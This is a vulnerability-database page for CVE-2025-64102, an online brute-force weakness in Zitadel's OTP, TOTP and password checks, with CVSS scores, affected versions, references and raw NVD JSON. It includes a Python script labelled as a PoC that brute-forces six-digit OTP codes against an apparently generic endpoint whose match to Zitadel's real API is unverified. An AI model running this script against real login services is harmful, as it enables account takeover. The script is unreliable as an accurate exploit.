CVE-2025-64102

Description

Zitadel is open-source identity infrastructure software. Prior to 4.6.0, 3.4.3, and 2.71.18, an attacker can perform an online brute-force attack on OTP, TOTP, and passwords. While Zitadel allows preventing online brute force attacks in scenarios like TOTP, Email OTP, or passwords using a lockout mechanism. The mechanism is not enabled by default and can cause a denial of service for the corresponding user if enabled. Additionally, the mitigation strategies were not fully implemented in the more recent resource-based APIs. This vulnerability is fixed in 4.6.0, 3.4.3, and 2.71.18.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE

Zitadel < 2.71.18

Zitadel < 3.4.3

Zitadel < 4.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import time import itertools # CVE-2025-64102 PoC - Zitadel OTP/TOTP Online Brute Force Attack # This PoC demonstrates the vulnerability in Zitadel authentication TARGET_URL = "https://your-zitadel-instance.com" TARGET_USER = "[email protected]" # Common OTP/TOTP patterns to try otp_patterns = [ f"{i:06d}" for i in range(1000000) # 6-digit OTPs ] def attempt_login(otp_code): """Attempt authentication with provided OTP code""" endpoint = f"{TARGET_URL}/auth/v1/users/{TARGET_USER}/otp_verify" payload = { "code": otp_code, "user_id": TARGET_USER } try: response = requests.post(endpoint, json=payload, timeout=5) if response.status_code == 200 and "access_token" in response.text: print(f"[SUCCESS] Valid OTP found: {otp_code}") return True except requests.exceptions.RequestException: pass return False def brute_force_otp(): """Brute force attack against Zitadel OTP authentication""" print(f"[*] Starting OTP brute force attack against {TARGET_USER}") print(f"[*] Target: {TARGET_URL}") # Note: In real attack scenario, attacker would iterate through OTP codes # This PoC is for educational/security research purposes only for i, otp in enumerate(otp_patterns[:10000]): # Limited iterations for demo if attempt_login(otp): return otp if i % 1000 == 0: print(f"[*] Attempted {i} OTP codes...") time.sleep(0.1) # Minimal delay, showing lack of rate limiting print("[*] Attack completed without success (or limit reached)") return None if __name__ == "__main__": brute_force_otp()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64102
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64102
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64102/
[4] VulDB https://vuldb.com/cve/CVE-2025-64102
[5] https://github.com/zitadel/zitadel/commit/b8db8cdf9cc8ea13f461758aef12457f8b7d972a
[6] https://github.com/zitadel/zitadel/security/advisories/GHSA-xrw9-r35x-x878

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64102", "sourceIdentifier": "[email protected]", "published": "2025-10-29T19:15:38.927", "lastModified": "2025-11-04T13:18:57.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zitadel is open-source identity infrastructure software. Prior to 4.6.0, 3.4.3, and 2.71.18, an attacker can perform an online brute-force attack on OTP, TOTP, and passwords. While Zitadel allows preventing online brute force attacks in scenarios like TOTP, Email OTP, or passwords using a lockout mechanism. The mechanism is not enabled by default and can cause a denial of service for the corresponding user if enabled. Additionally, the mitigation strategies were not fully implemented in the more recent resource-based APIs. This vulnerability is fixed in 4.6.0, 3.4.3, and 2.71.18."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.71.18", "matchCriteriaId": "CC5B40B7-D194-4612-84F5-9EE0477D1492"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.4.3", "matchCriteriaId": "71F16C15-7BC0-48BF-94CA-A0675AE8144E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.6.0", "matchCriteriaId": "EBBE21CE-7517-4843-AD68-281A0254BC26"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/b8db8cdf9cc8ea13f461758aef12457f8b7d972a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-xrw9-r35x-x878", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}